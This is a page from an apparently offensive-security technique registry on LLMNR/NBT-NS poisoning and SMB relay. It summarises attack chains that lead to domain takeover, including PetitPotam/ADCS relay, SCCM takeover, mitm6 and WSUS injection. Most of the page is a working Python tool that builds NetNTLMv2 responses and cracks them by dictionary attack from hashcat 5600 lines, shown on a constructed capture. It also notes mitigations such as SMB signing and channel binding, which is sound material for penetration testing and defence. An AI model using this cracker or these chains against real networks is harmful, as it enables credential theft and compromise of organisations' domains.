LLMNR/NBT-NS Poisoning and SMB Relay
Spoof name resolution to coerce victims to authenticate, then relay or crack the captured NetNTLMv2.
§ Where this technique fits
T1557.001 is catalogued under the Credential Access tactic of the offensive-security kill-chain (MITRE ATT&CK lists it as a sub-technique of Adversary-in-the-Middle, T1557, under both Credential Access and Collection). It appears in 7 approved dossiers in the registry, at an average step position of 3.3.
Authoritative reference: attack.mitre.org/techniques/T1557/001/.
§ Dossiers chaining this technique
- Step 2 of 4: WSUS over HTTP → push code to managed clients
Clients that fetch updates from an HTTP WSUS server can be MITM'd and handed a crafted update whose payload is a Microsoft-signed binary (classically PsExec) launched with attacker-chosen arguments; the client's signature check passes and the command runs as SYSTEM.
- Step 2 of 8: No creds → Domain Admin via LLMNR poisoning and NTLM relay
An unauthenticated attacker on the LAN poisons name resolution, relays the captured NetNTLMv2 authentication to a host where SMB signing is not required, then escalates to Domain Admin.
- Step 2 of 6: PetitPotam + ADCS ESC8 → Domain Controller takeover
Coerce a DC's machine account to authenticate to the attacker, relay that NTLM authentication to the ADCS HTTP web-enrollment endpoint, and obtain a certificate for the DC that yields full domain compromise.
- Step 3 of 7: SCCM site takeover via NTLM relay (Takeover-1)
Coerce the SCCM site server to authenticate, relay to MSSQL on the site database server, and grant yourself the Full Administrator role inside SCCM.
- Step 4 of 7: mitm6 IPv6 SLAAC → NTLM relay → DA
Even when IPv4 name resolution is hardened, Windows clients prefer IPv6 and send DHCPv6 requests by default. mitm6 answers them so the attacker becomes the IPv6 DNS server, advertises a WPAD host, and the captured NTLM authentication is relayed to LDAPS to configure RBCD.
- Step 4 of 5: Rogue DHCP → DNS poisoning → MITM
Bring up a DHCP server on the segment that answers faster than the legitimate one; new clients receive the attacker as gateway and DNS. From there: strip HTTPS, capture credentials, inject payloads.
- Step 6 of 6: 802.1X NAC bypass via printer MAC spoof
Plug into the LAN, sniff the MAC of a printer or IP phone, clone it on your laptop, and obtain full LAN access through MAC Authentication Bypass, sidestepping NAC entirely.
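The subtitle and the LLMNR-poisoning dossier above both hinge on what the attacker actually captures: a NetNTLMv2 response, which can be cracked offline or relayed. The following is an added worked example (not code from this page or from Responder/ntlmrelayx) that builds a NetNTLMv2 response exactly as a client would, emits it in the hashcat mode 5600 line format, and runs a dictionary attack against it. Every name in it (CORP, j.doe, FS01, the challenges and the password) is a constructed sample, not a real capture. MD4 is implemented in pure Python because many OpenSSL 3 builds no longer expose it through hashlib.

```python
"""Added example: construct, export and crack a NetNTLMv2 response (constructed data only)."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's 'md4' is often unavailable on OpenSSL 3 builds."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    k3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    rounds = ((f, 0, (3, 7, 11, 19)), (g, 0x5A827999, (3, 5, 9, 13)), (h, 0x6ED9EBA1, (3, 9, 11, 15)))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for rnd, (fn, add, shifts) in enumerate(rounds):
            for i in range(16):
                k = i if rnd == 0 else ((i % 4) * 4 + i // 4 if rnd == 1 else k3[i])
                t = (-i) % 4  # registers are updated in the order a, d, c, b
                s[t] = rotl((s[t] + fn(s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]) + x[k] + add) & mask,
                            shifts[i % 4])
        state = [(a + b) & mask for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password (no salt, which is why offline cracking works)."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5(NT hash, UPPER(user) || domain); the domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def av_pairs(pairs) -> bytes:
    """Target info (AV_PAIR list) as carried in the server's CHALLENGE message, ending in MsvAvEOL."""
    out = b"".join(struct.pack("<HH", av_id, len(v.encode("utf-16le"))) + v.encode("utf-16le") for av_id, v in pairs)
    return out + struct.pack("<HH", 0, 0)


def ntlmv2_response(password, user, domain, server_challenge, client_challenge, filetime, target_info):
    """Return (NTProofStr, blob). The proof is an HMAC over the server challenge and the client blob only:
    nothing binds it to the endpoint that issued the challenge, so a relay that forwards a real server's
    challenge to the victim can forward the proof back, unless signing or channel binding (AV ids 9/10)
    are enforced on the target."""
    blob = (b"\x01\x01\x00\x00\x00\x00\x00\x00" + struct.pack("<Q", filetime) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof, blob


def to_hashcat_5600(user, domain, server_challenge, proof, blob) -> str:
    """hashcat -m 5600 line: user::domain:serverchallenge:NTProofStr:blob (all hex)."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_5600(line: str, wordlist):
    """Dictionary attack on a 5600 line; returns the password or None. One HMAC-MD5 per candidate."""
    user, _, domain, sc, proof, blob = line.split(":")
    challenge_and_blob = bytes.fromhex(sc) + bytes.fromhex(blob)
    want = bytes.fromhex(proof)
    for candidate in wordlist:
        got = hmac.new(ntowf_v2(candidate, user, domain), challenge_and_blob, hashlib.md5).digest()
        if hmac.compare_digest(got, want):
            return candidate
    return None


def constructed_capture() -> str:
    """Constructed sample: a poisoned LLMNR lookup made CORP\\j.doe's SMB client authenticate to the
    attacker, who chose server_challenge. All names, challenges and the password are made up."""
    user, domain, password = "j.doe", "CORP", "Summer2024!"
    server_challenge = bytes.fromhex("1122334455667788")   # attacker-chosen (Responder uses a fixed one by default)
    client_challenge = bytes.fromhex("a1b2c3d4e5f60718")
    filetime = 133600000000000000                          # Windows FILETIME, constructed
    target_info = av_pairs([(2, "CORP"), (1, "FS01"), (3, "fs01.corp.local")])  # NbDomain, NbComputer, DnsComputer
    proof, blob = ntlmv2_response(password, user, domain, server_challenge, client_challenge, filetime, target_info)
    return to_hashcat_5600(user, domain, server_challenge, proof, blob)


if __name__ == "__main__":
    line = constructed_capture()
    print(line)
    print("cracked:", crack_5600(line, ["Winter2023!", "Password1", "Summer2024!"]))
```

The 5600 line is what Responder writes to its logs directory and what hashcat consumes; the cracking loop is the same computation hashcat performs, one HMAC-MD5 per candidate with no salt stretching, which is why short or reused passwords fall quickly. The docstring on `ntlmv2_response` is the relay caveat: the proof is only bound to the challenge, so requiring SMB signing (and LDAP signing / channel binding, EPA on HTTP endpoints) on the relay targets is what breaks the chains in the dossiers above, not disabling LLMNR alone.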
§ What commonly comes next
- 01 Authentication Coercion (AD-COERCE · Initial Access), seen 1×
- 02 Brute Force (T1110 · Credential Access), seen 1×
- 03 Resource-Based Constrained Delegation (RBCD) Abuse (AD-RBCD · Lateral Movement), seen 1×
- 04 SCCM Client Push Installation Abuse (AD-SCCM-CLIENTPUSH · Privilege Escalation), seen 1×
- 05 SMB/Windows Admin Shares (T1021.002 · Lateral Movement), seen 1×
- 06 WSUS Update Injection (HTTP) (AD-WSUS · Privilege Escalation), seen 1×